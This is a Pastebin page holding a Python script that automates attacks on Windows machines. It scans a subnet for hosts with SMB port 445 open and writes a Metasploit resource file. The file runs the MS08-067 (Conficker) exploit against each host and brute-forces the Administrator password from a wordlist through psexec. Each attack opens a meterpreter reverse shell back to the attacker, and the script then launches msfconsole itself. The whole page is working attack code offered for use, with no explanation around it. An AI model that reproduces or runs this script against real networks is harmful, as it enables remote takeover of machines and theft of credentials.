Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import os
- import sys
- import argparse
- import nmap
- def findTgts(subnet):
- nmScan = nmap.PortScanner()
- nmScan.scan(subnet, '445')
- tgtHosts = []
- for host in nmScan.all_hosts():
- if nmScan[host].has_tcp(445):
- state = nmScan[host]['tcp'][445]['state']
- if state == 'open':
- tgtHosts.append(host)
- return tgtHosts
- def setupHandler(configFile, lhost, lport):
- configFile.write('use exploit/multi/handler\n')
- configFile.write('set payload ' + 'windows/meterpreter/reverse_tcp\n')
- configFile.write('set lhost=' + lhost + '\n')
- configFile.write('set lport=' + str(lport) + '\n')
- configFile.write('exploit -j -z' + '\n')
- configFile.write('setg DisablePayloadHandler 1' + '\n')
- def confickerExploit(configFile,tgtHost,lhost,lport):
- configFile.write('use exploit/windows/smb/ms08_067_netapi\n')
- configFile.write('set RHOST=' + str(tgtHost) + '\n')
- configFile.write('set payload '+ 'windows/meterpreter/reverse_tcp' + '\n')
- configFile.write('set lhhost=' + str(lhost)+ '\n')
- configFile.write('set lport=' + str(lport) + '\n')
- configFile.write('exploit -jz' + '\n')
- def smbBrute(configFile, tgtHost, passFile, lhost, lport):
- user = 'Administrator'
- pF = open(passFile, 'r')
- for password in pF.readlines():
- password = password.strip('\n').strip('\r')
- configFile.write('use exploit/windows/smb/ps_exec\n')
- configFile.write('set rhost=' + str(tgtHost) + '\n')
- configFile.write('set SMBUser=' + str(user) + '\n')
- configFile.write('set SMBPass' + str(password) + '\n')
- configFile.write('set payload '+ 'windows/meterpreter/reverse_tcp' + '\n')
- configFile.write('set lhost=' + str(lhost) + '\n')
- configFile.write('set lport=' + str(lport) + '\n')
- configFile.write('exploit -jz' + '\n')
- def main():
- configFile = open('Conf.rc','w')
- parser = argparse.ArgumentParser(prog='Metasploittest') # type: str
- parser.add_argument('-lh','--lhost',help='Your own IP',default='127.0.0.1')
- parser.add_argument('-lp', '--lport',help='Your own Port')
- parser.add_argument('-rh', '--rhost', help='The IP to be attacked')
- parser.add_argument('-pf', '--password', help='The password file to be used')
- args = parser.parse_args()
- lhost = args.lhost
- lport = args.lport
- rhost = args.rhost
- passFile = args.password
- if rhost == None or lhost == None or passFile == None:
- print parser.print_help()
- sys.exit(1)
- if lport == None:
- lport = '1337'
- tgtHosts = findTgts(rhost)
- setupHandler(configFile,lhost,lport)
- for tgtHost in tgtHosts:
- confickerExploit(configFile,tgtHost,lhost,lport)
- if passFile != None:
- smbBrute(configFile,tgtHost,passFile,lhost,lport)
- configFile.close()
- os.system('msfconsole -r Conf.rc')
- if __name__ == "__main__":
- main()
Add Comment
Please, Sign In to add comment